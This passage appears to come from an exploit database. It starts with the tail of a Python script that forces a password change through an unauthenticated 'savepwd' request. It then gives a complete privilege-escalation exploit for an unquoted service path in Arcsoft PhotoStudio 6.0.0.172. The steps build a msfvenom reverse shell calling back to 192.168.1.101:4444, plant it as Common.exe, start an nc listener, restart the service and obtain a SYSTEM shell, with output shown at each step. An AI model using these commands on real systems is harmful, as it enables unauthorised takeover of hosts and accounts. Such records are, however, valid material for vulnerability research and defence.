    "Accept-Language": "en-US;q=0.8,en;q=0.7"
}
data = {"func": "savepwd", "pwd": "sköll"}  # change password

response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
    print("Successful!")
    print("New Password: " + data["pwd"])
else:
    print("Exploit Failed!")
```
-
Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path
##########################################################################
#                                                                        #
# Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path   #
# Date: 2023/04/22                                                       #
# Exploit Author: msd0pe                                                 #
# Vendor Homepage: https://www.arcsoft.com/                              #
# My Github: https://github.com/msd0pe-1                                 #
#                                                                        #
##########################################################################

Arcsoft PhotoStudio: versions <= 6.0.0.172 contain an unquoted service path which allows attackers to escalate privileges to the SYSTEM level.

[1] Find the unquoted service path:

```
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ArcSoft Exchange Service    ADExchange    C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe    Auto
```

[2] Get information about the service:

```
> sc qc "ADExchange"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ADExchange
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ArcSoft Exchange Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

[3] Generate a reverse shell:

```
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe
```

[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe

```
> put Common.exe
> ls
drw-rw-rw-          0  Sun Apr 23 04:10:25 2023 .
drw-rw-rw-          0  Sun Apr 23 04:10:25 2023 ..
drw-rw-rw-          0  Sun Apr 23 03:55:37 2023 ArcSoft
drw-rw-rw-          0  Sun Apr 23 03:55:36 2023 Common Files
-rw-rw-rw-       7168  Sun Apr 23 04:10:25 2023 Common.exe
-rw-rw-rw-        174  Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw-          0  Sun Apr 23 03:55:36 2023 InstallShield Installation Information
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw-          0  Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw-          0  Sat Apr 22 05:48:20 2023 Windows Defender
drw-rw-rw-          0  Sat Apr 22 05:46:44 2023 Windows Mail
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw-          0  Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 WindowsPowerShell
```

[5] Start listener

```
> nc -lvp 4444
```

[6] Restart the service/server

```
> sc stop "ADExchange"
> sc start "ADExchange"
```

OR

```
> shutdown /r
```

[7] Enjoy!

```
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
```